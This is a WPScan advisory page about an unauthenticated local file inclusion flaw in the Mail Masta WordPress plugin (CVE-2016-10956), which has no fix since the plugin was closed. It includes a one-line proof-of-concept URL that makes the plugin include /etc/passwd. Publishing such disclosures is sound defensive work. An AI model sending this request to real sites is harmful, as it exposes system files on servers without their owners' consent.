WPScan
How it worksPricing
Vulnerabilities
WordPressPluginsThemesStatsSubmit vulnerabilities
For developers
StatusAPI detailsCLI scanner
Contact

WordPress Plugin Vulnerabilities

Mail Masta <= 1.0 - Unauthenticated Local File Inclusion (LFI)

Description

The plugin does not validate the pl parameter before using it in an include statement, leading to a Local File Inclusion issue

Proof of Concept

http://example.com/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/etc/passwd

Affects Plugins

mail-masta
No known fix - plugin closed

References

CVE
CVE-2016-10956
URL
https://cxsecurity.com/issue/WLB-2016080220
ExploitDB
40290
ExploitDB
50226

Classification

Type

LFI

OWASP top 10
A1: Injection
CWE
CWE-22

Miscellaneous

Submitter

ethicalhack3r

Submitter twitter
ethicalhack3r
Verified

Yes

WPVDB ID
5136d5cf-43c7-4d09-bf14-75ff8b77bb44

Timeline

Publicly Published

2016-08-23 (about 5 years ago)

Added

2016-08-24 (about 5 years ago)

Last Updated

2022-04-10 (about 1 months ago)

Our Other Services

WPScan WordPress Security Plugin